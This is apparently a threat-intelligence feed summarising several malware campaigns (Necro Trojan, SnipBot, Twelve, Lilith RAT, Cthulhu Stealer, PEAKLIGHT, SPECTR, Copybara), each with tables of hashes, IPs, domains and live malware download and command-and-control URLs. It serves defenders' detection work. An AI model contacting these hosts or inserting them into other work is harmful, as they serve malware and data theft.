| FileHash-SHA1 | ff69b5e96a83f4f5657a087649882ec8b5ba09d2 |
| FileHash-SHA256 | 0187db1c61f146d49f74fb7db1dccec1e42ad7d431bffbfcaeec910af1a4bc68 |
| FileHash-SHA256 | 09e09503962a2a8022859e72b86ad8c69dcbf79839b71897c0bf8a4c4b9f4dd6 |
| FileHash-SHA256 | 14c270cf53a50867e42120250abca863675d37abf39d60689e58288a9e870144 |
| FileHash-SHA256 | 165a80f6856487b3b4f41225ac60eed99c3d603f5a35febab8235757a273d1fd |
| FileHash-SHA256 | 2722e289767ae391e3c3773b8640a8b9f6eb24c6a9d6e541f29c8765f7a8944b |
| FileHash-SHA256 | 28fadc26a2bee907fbdbf1aaebac6c7e6f8aa95e8c312cd659d19b82d1dfa70e |
| FileHash-SHA256 | 2ae6c5c2b71361f71ded4ad90bbf6ef0b0f4778caf54078c928e2017302fbe69 |
| FileHash-SHA256 | 31a35e3b87a7f81449d6f3e195dc0660b5dae4ac5b7cd9a65a449526e8fb7535 |
| FileHash-SHA256 | 39da7cc7c627ea4c46f75bcec79e5669236e6b43657dcad099e1b9214527670e |
| FileHash-SHA256 | 3e4e179a7a6718eedf36608bd7130b62a5a464ac301a211c3c8e37c7e4b0b32b |
| FileHash-SHA256 | 3f9db7bf1c9d897d46f669854e7ecc945778024f04cac9cd1585140d0d73a34f |
| FileHash-SHA256 | 4b41b605ffc0e31bd9d460d5a296ac6e8cfd56a215dc131e90ec2654f0ffe31b |
| FileHash-SHA256 | 4f839eac8204930ecc21a35476069daabbd40c14ef5af4db0e66de9b6a2e62fb |
| FileHash-SHA256 | 5bfb635c43eb73f25f4e75961a715b96fa764bbe096086fc1e037a7869c7878b |
| FileHash-SHA256 | 5e2642f33115c3505bb1d83b137e7f2b18e141930975636e6230cdd4292990dd |
| FileHash-SHA256 | 638c7a4f833dc95dbab5f0a81ef03b7d83704e30b5cdc630702475cc9fff86a2 |
| FileHash-SHA256 | 65667d0b1710636d4b2030a25f64d0f960d75ebfc3f5ad92f03f78293b47ed75 |
| FileHash-SHA256 | 70cab18770795ea23e15851fa49be03314dc081fc44cdf76e8f0c9b889515c1b |
| FileHash-SHA256 | 77505dcec5d67cc0f6eb841f50da7e7c41a69419d50dc6ce17fffc48387452e1 |
| FileHash-SHA256 | 7e6a5e32596b99f45ea9099a14507a82c10a460c56585499d7cd640f2625567f |
| FileHash-SHA256 | 7e7292b5029882602fe31f15e25b5c59e01277abaab86b29843ded4aa0dcbdd1 |
| FileHash-SHA256 | 85103955e35a1355ce68a92eaedd8f9376de1927d95bf12657b348dea6a8077b |
| FileHash-SHA256 | 887c09e24923258e2e2c28f369fba3e44e52ce8a603fa3aee8c3fb0f1ca660e1 |
| FileHash-SHA256 | 8bee2012e1f79d882ae635a82b65f88eaf053498a6b268c594b0d7d601b1212f |
| FileHash-SHA256 | 9a33655007a4fddf9c434d84fafe205479aaa3f5eaf7425e14beb83e46fa7041 |
| FileHash-SHA256 | 9a785f508890d250ab9e3a43f974a89f3311ebd0e85ec98b46c76bdb7bef7cfb |
| FileHash-SHA256 | 9b345d2d9f52cda989a0780acadf45350b423957fb7b7668b9193afca3e0cd27 |
| FileHash-SHA256 | a6b1de8184a7e560cea461b0e05d4136d0068b35c12c0889c4036d177e331a83 |
| FileHash-SHA256 | b2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf |
| FileHash-SHA256 | bab601635aafeae5fbfe1c1f7204de17b189b345efd91c46001f6d83efbb3c5a |
| FileHash-SHA256 | c6128f222f844e699760e32695d405bd5931635ec38ae50eddc17a0976ccefb4 |
| FileHash-SHA256 | cc8be1d525853403f6cfabcf0fc3bd0ca398ece559388102a7fc55e9f3aa9b33 |
| FileHash-SHA256 | d550f0f9c4554e63b6e6d0a95a20a16abe44fa6f0de62b6615b5fdcdb82fe8e1 |
| FileHash-SHA256 | d65d80ab0ccdc7ff0a72e71104de2b4c289c02348816dce9996ba3e2a4c1dd62 |
| FileHash-SHA256 | dd2675e2f6835f8a8a0e65e9dbc763ca9229b55af7d212da38b949051ae296a5 |
| FileHash-SHA256 | dedc593acc72c352feef4cc2b051001bfe22a79a3a7852f0daf95e2d10e58b84 |
| FileHash-SHA256 | ec553e14b84ccca9b84e96a9ed19188a1ba5f4bf1ca278ab88f928f0b00b9bd0 |
| FileHash-SHA256 | f17f6866f4748e6e762752062acdf983d3b083371db83503686b91512b9bcae3 |
| FileHash-SHA256 | f511bdd471096fc81dc8dad6806624a73837710f99b76b69c6501cb90e37c311 |
| FileHash-SHA256 | f664670044dbd967ff9a5d8d8f345be294053e0bae80886cc275f105d8e7a376 |
| FileHash-SHA256 | f865531608a4150ea5d77ef3dd148209881fc8d831b2cfb8ca95ceb5868e1393 |
| FileHash-SHA256 | fb02e97d52a00fca1580ca71ed152dd28dd5ae28ab0a9c8e7b32cebd7f1998a1 |
| FileHash-SHA256 | ff2ae62ba88e7068fa142bbe67d7b9398e8ae737a43cf36ace1fcf809776c909 |
| FileHash-SHA256 | ffbe988fd797cbb9a1eedb705cf00ebc8277cdbd9a21b6efb40a8bc22c7a43f0 |
| IPv4 | 146.70.149.61 |
| IPv4 | 178.32.30.3 |
| IPv4 | 193.109.120.59 |
| IPv4 | 51.254.25.36 |
| IPv4 | 51.255.19.178 |

Necro Trojan infiltrates Google Play and Spotify and WhatsApp mods

A new version of the Necro Trojan has infected various popular applications, including game mods and apps on Google Play, potentially affecting over 11 million Android devices. The multi-stage loader uses steganography to hide payloads and obfuscation to evade detection. Its modular architecture allows for targeted delivery of updates or new malicious modules. The Trojan can display ads, download and execute arbitrary files, install applications, open links in invisible windows, run tunnels through victim devices, and potentially subscribe to paid services. Infected apps include Wuta Camera, Max Browser, and modified versions of Spotify, WhatsApp, and games like Minecraft.

| Type | Indicator |
| --- | --- |
| IPv4 | 47.88.3.73 |
| FileHash-MD5 | 0898d1a6232699c7ee03dd5e58727ede |
| FileHash-MD5 | 1590d5d62a4d97f0b12b5899b9147aea |
| FileHash-MD5 | 1cab7668817f6401eb094a6c8488a90c |
| FileHash-MD5 | 1eaf43be379927e050126e5a7287eb98 |
| FileHash-MD5 | 247a0c5ca630b960d51e4524efb16051 |
| FileHash-MD5 | 28b8d997d268588125a1be32c91e2b92 |
| FileHash-MD5 | 30d69aae0bdda56d426759125a59ec23 |
| FileHash-MD5 | 36ab434c54cce25d301f2a6f55241205 |
| FileHash-MD5 | 37404ff6ac229486a1de4b526dd9d9b6 |
| FileHash-MD5 | 4c2bdfcc0791080d51ca82630213444d |
| FileHash-MD5 | 4e9bf3e8173a6f3301ae97a3b728f6f1 |
| FileHash-MD5 | 522d2e2adedc3eb11eb9c4b864ca0c7f |
| FileHash-MD5 | 52a2841c95cfc26887c5c06a29304c84 |
| FileHash-MD5 | 59b44645181f4f0d008c3d6520a9f6f3 |
| FileHash-MD5 | 874418d3d1a761875ebc0f60f9573746 |
| FileHash-MD5 | acb7a06803e6de85986ac49e9c9f69f1 |
| FileHash-MD5 | b3ba3749237793d2c06eaaf5263533f2 |
| FileHash-MD5 | b69a83a7857e57ba521b1499a0132336 |
| FileHash-MD5 | ccde06a19ef586e0124b120db9bf802e |
| FileHash-MD5 | ed6c6924201bc779d45f35ccf2e463bb |
| FileHash-MD5 | f338384c5b4bc7d55681a3532273b4eb |
| FileHash-MD5 | fa217ca023cda4f063399107f20bd123 |
| FileHash-SHA1 | 7d1a369050b3bcb2274ee3580c08d1dc36afff13 |
| FileHash-SHA256 | 2001dcbde6310fd03413d7936475d50e8bbafc6bd3c62ae637af2039cb74fff1 |
| IPv4 | 47.88.190.200 |
| IPv4 | 47.88.245.162 |
| IPv4 | 47.88.246.111 |
| hostname | hsa.govsred.buzz |

Inside SnipBot: The Latest RomCom Malware Variant

A novel version of the RomCom malware family called SnipBot has been discovered, revealing post-infection activity from attackers on victim systems. This new strain employs new tricks and unique code obfuscation methods beyond those seen in previous RomCom versions. The infection chain begins with a downloader disguised as a PDF, followed by multiple stages including DLLs injected into explorer.exe. SnipBot provides backdoor capabilities allowing command execution, file exfiltration, and additional payload downloads. Analysis of attacker post-infection activity shows attempts to gather network information, exfiltrate files, and explore Active Directory. The malware authors appear experienced but not elite, with some minor code flaws present. SnipBot has evolved from earlier RomCom versions, with samples dating back to December 2023.

| Type | Indicator |
| --- | --- |
| IPv4 | 23.137.249.182 |
| IPv4 | 23.184.48.90 |
| FileHash-MD5 | 7f2e4a44445b977ef8917cc0fb79035b |
| FileHash-MD5 | c0e499402acb6c302228b4a7923d5db6 |
| FileHash-SHA1 | 983332a5660ec6c28123e745023b41105775ab6f |
| FileHash-SHA1 | cb3d3a7e39e7cdc8501ae0eff77d02a1c995bc31 |
| FileHash-SHA256 | 0be3116a3edc063283f3693591c388eec67801cdd140a90c4270679e01677501 |
| FileHash-SHA256 | 1cb4ff70f69c988196052eaacf438b1d453bbfb08392e1db3df97c82ed35c154 |
| FileHash-SHA256 | 2c327087b063e89c376fd84d48af7b855e686936765876da2433485d496cb3a4 |
| FileHash-SHA256 | 5390ba094cf556f9d7bbb00f90c9ca9e04044847c3293d6e468cb0aaeb688129 |
| FileHash-SHA256 | 57e59b156a3ff2a3333075baef684f49c63069d296b3b036ced9ed781fd42312 |
| FileHash-SHA256 | 5b30a5b71ef795e07c91b7a43b3c1113894a82ddffc212a2fa71eebc078f5118 |
| FileHash-SHA256 | 5c71601717bed14da74980ad554ad35d751691b2510653223c699e1f006195b8 |
| FileHash-SHA256 | 60d96087c35dadca805b9f0ad1e53b414bcd3341d25d36e0190f1b2bbfd66315 |
| FileHash-SHA256 | 92c8b63b2dd31cf3ac6512f0da60dabd0ce179023ab68b8838e7dc16ef7e363d |
| FileHash-SHA256 | a2f2e88a5e2a3d81f4b130a2f93fb60b3de34550a7332895a084099d99a3d436 |
| FileHash-SHA256 | b9677c50b20a1ed951962edcb593cce5f1ed9c742bc7bff827a6fc420202b045 |
| FileHash-SHA256 | cfb1e3cc05d575b86db6c85267a52d8f1e6785b106797319a72dd6d19b4dc317 |
| FileHash-SHA256 | e5812860a92edca97a2a04a3151d1247c066ed29ae6bbcf327d713fbad7e79e8 |
| FileHash-SHA256 | f74ebf0506dc3aebc9ba6ca1e7460d9d84543d7dadb5e9912b86b843e8a5b671 |
| IPv4 | 185.225.74.94 |
| IPv4 | 212.46.38.222 |
| IPv4 | 23.137.248.220 |
| IPv4 | 23.137.249.14 |
| IPv4 | 38.180.5.251 |
| IPv4 | 79.141.170.34 |
| IPv4 | 91.92.242.87 |
| IPv4 | 91.92.250.104 |
| IPv4 | 91.92.250.106 |
| IPv4 | 91.92.250.240 |
| IPv4 | 91.92.254.234 |
| IPv4 | 91.92.254.54 |
| domain | cloudcreative.digital |
| domain | dns-msn.com |
| domain | drvmcprotect.com |
| domain | fastshare.click |
| domain | ilogicflow.com |
| domain | mcprotect.cloud |
| domain | publicshare.link |
| domain | sitepanel.top |
| hostname | 1drv.fileshare.direct |
| hostname | adobe.cloudcreative.digital |

From initial compromise to ransomware and wipers

The Twelve group, formed in April 2023 amid the Russian-Ukrainian conflict, specializes in attacking Russian government organizations. Their attacks involve encrypting and deleting victims' data, causing maximum damage without seeking financial gain. The group uses publicly available tools like Cobalt Strike, mimikatz, and PowerShell scripts for initial access, lateral movement, and privilege escalation. They employ LockBit 3.0 ransomware and Shamoon-based wipers to destroy infrastructure. Twelve exfiltrates sensitive data and posts it on Telegram. The group shares infrastructure with DARKSTAR, suggesting a possible syndicate. Their primary objectives are to destroy critical assets, disrupt business, steal sensitive data, and discredit victims.

| Type | Indicator |
| --- | --- |
| IPv4 | 5.8.16.148 |
| IPv4 | 5.8.16.169 |
| IPv4 | 212.109.217.88 |
| IPv4 | 79.137.69.34 |
| IPv4 | 89.238.132.68 |
| IPv4 | 89.33.8.198 |
| IPv4 | 91.90.121.220 |
| CVE | CVE-2021-21972 |
| CVE | CVE-2021-22005 |
| FileHash-MD5 | 05d80c987737e509ba8e6c086df95f7d |
| FileHash-MD5 | 31014add3cb96eee557964784bcf8fde |
| FileHash-MD5 | 39b91f5dfbbec13a3ec7cce670cf69ad |
| FileHash-MD5 | 43b3520d69dea9b0a27cce43c1608cad |
| FileHash-MD5 | 48b2e5c49f121d257b35ba599a6cd350 |
| FileHash-MD5 | 4bff90a6f7bafc8e719e8cab87ab1766 |
| FileHash-MD5 | 5c46f361090620bfdcac6afce1150fae |
| FileHash-MD5 | 5dcd02bda663342b5ddea2187190c425 |
| FileHash-MD5 | 646a228c774409c285c256a8faa49bde |
| FileHash-MD5 | 72830102884c5ebccf2afbd8d9a9ed5d |
| FileHash-MD5 | 7a7c0a521b7596318c7cd86582937d98 |
| FileHash-MD5 | 7bec3c59d412f6f394a290f95975e21f |
| FileHash-MD5 | 7dfa50490afe4553fa6889bdafda7da2 |
| FileHash-MD5 | 97aac7a2f0d2f4bdfcb0e8827a111524 |
| FileHash-MD5 | 9bd78bcf75b9011f9d7a9a6e5aee5bf6 |
| FileHash-MD5 | 9c74401a28bd71a87cdf5c17ad1dffa5 |
| FileHash-MD5 | d813f5d37ab2feed9d6a2b7d4d5b0461 |
| FileHash-MD5 | dad076c784d9fcbc506c1e614aa27f1c |
| FileHash-MD5 | e930b05efe23891d19bc354a4209be3e |
| FileHash-MD5 | ecb14e506727ee67220e87ced2e6781a |
| FileHash-MD5 | f8da1f02aa64e844770e447709cdf679 |
| FileHash-MD5 | f90e95b9fcab4c1b08ca06bc2c2d6e40 |
| FileHash-SHA1 | 12df98ea1706186be41d8a9f7067bfc7ae0b1fba |
| FileHash-SHA1 | 3fb65bff6f6d49eb46e2699d567fcabd241074a2 |
| FileHash-SHA1 | 4991ae0805909b777d554e9521b45760492a5d7d |
| FileHash-SHA1 | d1f7832035c3e8a73cc78afd28cfd7f4cece6d20 |
| FileHash-SHA256 | 4a4c8d32038388f6ca9475fb6db8024acd56a01721d53104c755f918fb31f221 |
| FileHash-SHA256 | 773f9b531c8d59a32aad6f7f50e4a22c6e5642d4e70eed0a12390caf66eb8403 |
| FileHash-SHA256 | 92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50 |
| FileHash-SHA256 | a028fe94a83846666ec974858398dbdcfd6fdd29bd995619a1f2542f611d62d6 |
| IPv4 | 109.205.56.229 |
| IPv4 | 193.110.79.47 |
| IPv4 | 195.2.79.195 |
| IPv4 | 217.148.143.196 |
| IPv4 | 5.8.16.147 |
| IPv4 | 5.8.16.149 |
| IPv4 | 5.8.16.170 |
| IPv4 | 5.8.16.236 |
| IPv4 | 5.8.16.238 |

Threat Tracking: Analysis of Lilith RAT ported to AutoIt Script

In April 2024, S2W's Threat Research and Intelligence Center TALON analyzed a malicious LNK file disguised as a list of tax evasion explanatory documents. The LNK file executed a PowerShell command to download and run an AutoIt script-based Lilith RAT malware from an attacker's server, which establishes a reverse shell on the infected system. Similarities between this campaign and KONNI group's tactics, such as command obfuscation and the use of AutoIt-ported malware, suggest the threat actor behind this attack could be linked to KONNI.

| Type | Indicator |
| --- | --- |
| FileHash-MD5 | 19dc387bffdc0a22f640bd38af320db4 |
| FileHash-MD5 | 3334d2605c0df26536058f73a43cb074 |
| FileHash-MD5 | 3c81dc763a4f003ba6e33cd5b63068cd |
| FileHash-MD5 | 4f865db4192afb5bbcdeb2e899ca97a4 |
| FileHash-MD5 | 5613ba2032bc1528991b583e17bad59a |
| FileHash-MD5 | 6d6433c328f6cdce4a80efce3a29ea3e |
| FileHash-MD5 | 6f5e4b45ca0d8c1128d27a15421eea38 |
| FileHash-MD5 | 7bb236041b91d4cd4fa129267cf109c3 |
| FileHash-MD5 | 9d6c79c0b395cceb83662aa3f7ed0123 |
| FileHash-MD5 | a0483db3725f8a50078daee7fd10f9bb |
| FileHash-MD5 | c56b5f0201a3b3de53e561fe76912bfd |
| FileHash-MD5 | d357fc478765a22f403c699a812f29bd |
| FileHash-MD5 | d5809e5f848f228634aa45ffe4a5ece0 |
| FileHash-SHA1 | 1a8d8aa268d0475408f8a10c96d4cfee5e122011 |
| FileHash-SHA1 | 2a4062e10a5de813f5688221dbeb3f3ff33eb417 |
| FileHash-SHA1 | 5ca50ceacfb31cbb04d6820e4021d911fcd8a60b |
| FileHash-SHA256 | 0329bb5b3a450b0a8f148a57e045bf6ed40eb49a62e026bd71b021a2efc40aed |
| FileHash-SHA256 | 2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e |
| FileHash-SHA256 | 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d |
| FileHash-SHA256 | 5bcfb56c4c884e3657bbfeacca37853113d640b77dff9af519c08c4b64ca029d |
| FileHash-SHA256 | 5ea09247ad85915a8d1066d1825061cc8348e14c4e060e1eba840d5e56ab3e4d |
| FileHash-SHA256 | 778e46f8f3641a92d34da68dffc168fdc936841c5ad3d8b44da62a7b2dfe2ee1 |
| FileHash-SHA256 | 77d05cc623f860ca2e6d47cdafc517aa0612de88291de7f2a3d95c5d04f1658a |
| FileHash-SHA256 | 7c08b9178c05ab765a3d7754ac99f4ba1abddb226dbb6cc898bc692bba1898a1 |
| FileHash-SHA256 | 808425bc599cd60989c90978d179af1d4c72dd7abfe5e0518aca44b48af15725 |
| FileHash-SHA256 | 9e1a3653029b5378736ea1debba44cd81988de73b6d8689f9eba792e719da79a |
| FileHash-SHA256 | ba59f1ece68fa051400fd46467b0dc0a5294b8644c107646e75d225a45fff015 |
| FileHash-SHA256 | c2cc785857c64fa1f8fbb2e359a2638f187cd77cd29ca6701e38d750e822faa4 |
| FileHash-SHA256 | e63082cf4db94f06d583a6313e48353366b44ce07b7ffceacc5bc4db88bd8810 |
| URL | http://185.231.154.22:52720 |
| URL | http://62.113.118.157:57860 |
| URL | http://93.183.93.185:57860 |
| domain | bgfile.com |
| domain | downwarding.com |
| domain | jethropc.com |
| domain | mq734121.info |
| domain | oryzanine.com |
| domain | phasechangesolutions.com |
| domain | radionaranjalstereo.com |
| domain | serviceset.net |
| domain | sibbss.com |
| domain | storkse.com |
| domain | ttzcloud.com |
| domain | werxtracts.com |
| hostname | file.drive002.com |
| hostname | www.cammirando.com |

From the Depths: Analyzing the Cthulhu Stealer Malware for macOS

This report analyzes Cthulhu Stealer, a malware-as-a-service targeting macOS users to steal credentials and cryptocurrency wallets. It explores the malware's functionality, including prompting users for passwords, dumping keychain data, and exfiltrating stolen information. The analysis compares Cthulhu Stealer to Atomic Stealer, another macOS malware with similar capabilities, and provides insights into the malware's operators and distribution methods via underground forums.

| Type | Indicator |
| --- | --- |
| FileHash-MD5 | 897384f9a792674b969388891653bb58 |
| FileHash-SHA256 | 6483094f7784c424891644a85d5535688c8969666e16a194d397dc66779b0b12 |
| FileHash-SHA256 | 96f80fef3323e5bc0ce067cd7a93b9739174e29f786b09357125550a033b0288 |
| FileHash-SHA256 | de33b7fb6f3d77101f81822c58540c87bd7323896913130268b9ce24f8c61e24 |
| FileHash-SHA256 | e3f1e91de8af95cd56ec95737669c3512f90cecbc6696579ae2be349e30327a7 |
| FileHash-SHA256 | f79b7cbc653696af0dbd867c0a5d47698bcfc05f63b665ad48018d2610b7e97b |
| URL | http://89.208.103.185 |
| URL | http://89.208.103.185:4000/autocheckbytes |
| URL | http://89.208.103.185:4000/notification_archive |

Decoding the Stealthy Memory-Only Malware

This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloader script, PEAKLIGHT, responsible for retrieving additional payloads from a content delivery network. The report examines different variations of PEAKLIGHT and the malware it delivers, including LUMMAC.V2, SHADOWLADDER, and CRYPTBOT. The analysis highlights the obfuscation techniques employed by the threat actors, such as system binary proxy execution and CDN abuse.

| Type | Indicator |
| --- | --- |
| FileHash-MD5 | c047ae13fc1e25bc494b17ca10aa179e |
| FileHash-SHA1 | e293c7815c0eb8fbc44d60a3e9b27bd91b44b522 |
| FileHash-SHA256 | 6c30c8a2e827f48fcfc934dd34fb2cb10acb8747fd11faae085d8ad352c01fbf |
| FileHash-MD5 | 059d94e8944eca4056e92d60f7044f14 |
| FileHash-MD5 | 236c709bbcb92aa30b7e67705ef7f55a |
| FileHash-MD5 | 307f40ebc6d8a207455c96d34759f1f3 |
| FileHash-MD5 | 43939986a671821203bf9b6ba52a51b4 |
| FileHash-MD5 | 47eee41b822d953c47434377006e01fe |
| FileHash-MD5 | 58c4ba9385139785e9700898cb097538 |
| FileHash-MD5 | 62f20122a70c0f86a98ff14e84bcc999 |
| FileHash-MD5 | 91423dd4f34f759aaf82aa73fa202120 |
| FileHash-MD5 | 95361f5f264e58d6ca4538e7b436ab67 |
| FileHash-MD5 | a6c4d2072961e9a8c98712c46be588f8 |
| FileHash-MD5 | b15bac961f62448c872e1dc6d3931016 |
| FileHash-MD5 | b6b8164feca728db02e6b636162a2960 |
| FileHash-MD5 | b716a1d24c05c6adee11ca7388b728d3 |
| FileHash-MD5 | bb9641e3035ae8c0ab6117ecc82b65a1 |
| FileHash-MD5 | c56b5f0201a3b3de53e561fe76912bfd |
| FileHash-MD5 | d6ea5dcdb2f88a65399f87809f43f83c |
| FileHash-MD5 | d7aff07e7cd20a5419f2411f6330f530 |
| FileHash-MD5 | d8e21ac76b228ec144217d1e85df2693 |
| FileHash-MD5 | dfdc331e575dae6660d6ed3c03d214bd |
| FileHash-MD5 | e7c43dc3ec4360374043b872f934ec9e |
| FileHash-MD5 | f98e0d9599d40ed032ff16de242987ca |
| FileHash-SHA1 | 1dcb61babb08fe5db711e379cb67335357a5db82 |
| FileHash-SHA1 | 2a4062e10a5de813f5688221dbeb3f3ff33eb417 |
| FileHash-SHA1 | 46a491abbbb434b6a1a2a1b1a793d24acd1d6c4b |
| FileHash-SHA256 | 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d |
| FileHash-SHA256 | 9fa7cacb5730faacc2b17d735c45ee1370130d863c3366d08ec013afe648bfa6 |
| FileHash-SHA256 | bf1a0c67b433f52ebd304553f022baa34bfbca258c932d2b4b8b956b1467bfa5 |
| URL | http://62.133.61.56/Downloads |
| URL | http://62.133.61.56/Downloads/Full |
| URL | http://62.133.61.56/Downloads/Full%20Video%20HD%20 |
| URL | http://gceight8vt.top/upload.php |
| URL | https://brewdogebar.com/code.vue |
| URL | https://forikabrof.click/flkhfaiouwrqkhfasdrhfsa.png |
| domain | brewdogebar.com |
| domain | considerrycurrentyws.shop |
| domain | deprivedrinkyfaiir.shop |
| domain | detailbaconroollyws.shop |
| domain | forikabrof.click |
| domain | gceight8vt.top |
| domain | horsedwollfedrwos.shop |
| domain | messtimetabledkolvk.shop |
| domain | patternapplauderw.shop |
| domain | relaxtionflouwerwi.shop |
| domain | tropicalironexpressiw.shop |
| domain | understanndtytonyguw.shop |

Report on Ukraine government attack campaign

Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfuscated PowerShell script designed to install the SPECTR malware and the new FIRMACHAGENT program. These components enabled data theft, document exfiltration, screenshot capturing, and browser data theft, while scheduled tasks managed the malware components. Reducing the attack surface by limiting user privileges and implementing application whitelisting policies can mitigate this threat.

| Type | Indicator |
| --- | --- |
| FileHash-MD5 | 2972616c870bffdb1978b487df290dfe |
| FileHash-MD5 | 4dd66548c1022822cf8247ca615ceea9 |
| FileHash-MD5 | 522c2988dd63e162503c41dc87d631f6 |
| FileHash-MD5 | 580a05ffdb0f3d5d703ccb2bcf04f9b7 |
| FileHash-MD5 | 65e5f73193f87e233244479859a00fd1 |
| FileHash-MD5 | 7d439f13a55f082fd674875f898197d7 |
| FileHash-MD5 | 7dc1016e78f8c243b3b0fa59eb648567 |
| FileHash-MD5 | a3c977578212134897a864795e769a8d |
| FileHash-MD5 | a9261e37a5a2fadbf58c71f15f48ad18 |
| FileHash-MD5 | a973224da0ebfca023ab3e55913447a9 |
| FileHash-MD5 | b58e45c4707b88dc1e89fd58359bfd5b |
| FileHash-MD5 | b99d5bfcdf9535f094204137ab064c96 |
| FileHash-MD5 | d657fa0c86523d0376cc0c988c6c9e11 |
| FileHash-MD5 | e2c25142f08cd8f9c6f87266c7ffb829 |
| FileHash-MD5 | e5b69e06a2452914250e34be1de4ae6a |
| FileHash-MD5 | ef123bc71a5f0e323b6a5c809d17d048 |
| FileHash-MD5 | f6b21151b924a31b936d3b299c0129b7 |
| FileHash-MD5 | f8efa529dff81b0e02a786fc766ffca3 |
| FileHash-SHA256 | 087158ad28080ef438047b88896dfa1962d1cd6fed8fce06e35c25f91ad5f1ff |
| FileHash-SHA256 | 180f9a2d3de0b5f031408797286837bb4b10b2a6d8797cf985347f5d80f9e4a0 |
| FileHash-SHA256 | 21c33c8365218b7fb1bbb0d45af77926877fb33384ef58fbbb6db04b9df55eb6 |
| FileHash-SHA256 | 3e6c13f9e4cee9b8d55d7a83fd3c3d5d6d09b6c477c4f84fd79db6cc8de7ea42 |
| FileHash-SHA256 | 4d8918cfcc97ca63666937e5d53373793f3695a2b1177e27a78aa34303c2ee80 |
| FileHash-SHA256 | 68fe595237eec1261184a5f3a00cc0f678a33751615796942001997575887557 |
| FileHash-SHA256 | 6a18392e3e062ce0fcd4688c0b09e482855cf709eb178437d8fe2cdc9cfdf51f |
| FileHash-SHA256 | 8612668466f9c8a180e0e9a3c92c85a03788f2f0bb3c6bf70f52c356e02702db |
| FileHash-SHA256 | 8987952745a8d46a8f2e6d1666cc9c542b6a9a96787ef467c76b779a8b6c1a66 |
| FileHash-SHA256 | 8d4808ed167ac91724e8ab4da24bcc3bd2159a4972c212a1cd4062f02a3731d0 |
| FileHash-SHA256 | ad30e29ba883c3f528d2782dbc3d1b5258815b619c6dfc3639fee416cf27fb1f |
| FileHash-SHA256 | b95ef984bfb22c55881931b134deaf1b848fbfda4180fc393b9f532f51089cbb |
| FileHash-SHA256 | d16239cfbee14a8621637934aebe2d5253fea04940d2eb082bd8dcdc41111d4b |
| FileHash-SHA256 | d44ff1bd3c7ff81228548c82ea68c33bdea780772ce55dc4be2d4156985a326a |
| FileHash-SHA256 | ea1945d887cbe8a56234cec6da2c46ed7a28ae6a69fd49181b3d13a71943ffd9 |
| FileHash-SHA256 | eef9f73dc7e0cdd4b1780ecd20845496a91e0f1c096264208d991935c5e97308 |
| FileHash-SHA256 | f00c85d9db7a2a2bf248771b8d81d978fa6d2153e6a3095d9c5896b604e9d00d |
| FileHash-SHA256 | f94b8d2391b53dfb96035a2ba628224c3bfedf77021c896b64a0d7c8f2121e17 |
| URL | http://171.22.120.50/data/Browser.txt |
| URL | http://171.22.120.50/data/Files.txt |
| URL | http://171.22.120.50/data/IDCLIPNET_x86.txt |
| URL | http://171.22.120.50/data/Screen.txt |
| URL | http://171.22.120.50/data/Social.txt |
| URL | http://171.22.120.50/data/USB.txt |
| URL | http://171.22.120.50/data/chrome_updater.txt |
| URL | http://prozorro.online/data/spysok_kursk.zip |
| URL | http://prozorro.online/info/docx/recon |
| URL | http://ukraero.space/jobs/download |
| URL | http://ukraero.space/jobs/upload |
| domain | prozorro.online |
| domain | ukraero.space |

Technical Analysis of Copybara

This report presents a comprehensive technical analysis of a newly discovered variant of the Copybara Android malware. The malware, which emerged in November 2021, is primarily spread through voice phishing attacks. It utilizes the MQTT protocol for command-and-control communication and abuses Android's Accessibility Service to exert control over infected devices. The malware downloads phishing pages mimicking cryptocurrency exchanges and financial institutions to steal user credentials. The analysis covers 59 supported commands with detailed functionality descriptions, providing valuable insights into the malware's capabilities.

| Type | Indicator |
| --- | --- |
| FileHash-MD5 | 03ee48f6e7f0840ef94336af579ccdf4 |
| FileHash-MD5 | 112bc421690788f883e62742cd7e142a |
| FileHash-MD5 | 1150d0bf3a077be4f33eb487129d389a |
| FileHash-MD5 | 14e70653b82895367d33ec8570c9038e |
| FileHash-MD5 | 1ec0f8696578e0e427140fd256ec4e4f |
| FileHash-MD5 | 215ca929eea5866ef9e879fe37f9ce17 |
| FileHash-MD5 | 215eb7fd4c261e17a696e8ba6a4061ed |
| FileHash-MD5 | 22483da70e998a316e9ac5b905b0fc9e |
| FileHash-MD5 | 271f79eb4ca49040fef16725777ac577 |
| FileHash-MD5 | 28f2aaa7855c1a2d5e5ec6444fa833a9 |
| FileHash-MD5 | 304f779e21b4f70f4ce70ce4dd19dbe8 |
| FileHash-MD5 | 3251cb4712b6c7aeb3f48c3ef767c735 |
| FileHash-MD5 | 3c90ca08d834d4650409a4282bbe6d42 |
| FileHash-MD5 | 459b8182aaaf3ef14e9fd4754b40610a |
| FileHash-MD5 | 4637f70bb727b40f3d7e8be88da1f244 |
| FileHash-MD5 | 4e51973921f1bf1c26b7d045d9716ae8 |
| FileHash-MD5 | 4f007c674721466ff8af2d6b8b0e6040 |
| FileHash-MD5 | 5391b95013437f299b6d096ad2fc96fb |
| FileHash-MD5 | 53be8d45faa3f943faf51fc95b76df5b |
| FileHash-MD5 | 5f0ce16fd6fe97db0aad3ccf70c5da82 |
| FileHash-MD5 | 65040bd2de9805826d66d1ff5996ed52 |
| FileHash-MD5 | 67664abfaec4d2d7e387c988d0c003ca |
| FileHash-MD5 | 68c7a9796ef7c50c56513618b6ab4f9c |
| FileHash-MD5 | 6d8af62f295ac4cfc23d20af97339440 |
| FileHash-MD5 | 6eb2123c58bb283790a43b5fdaef1c25 |
| FileHash-MD5 | 71896aa37e39028680b628cb05080028 |
| FileHash-MD5 | 7a4e9e5692e0031e130dbc41f3d74b82 |
| FileHash-MD5 | 7c203ad3d565fce177adf272d0acd373 |
| FileHash-MD5 | 933a030b3d7559a41a406f52a006c30f |
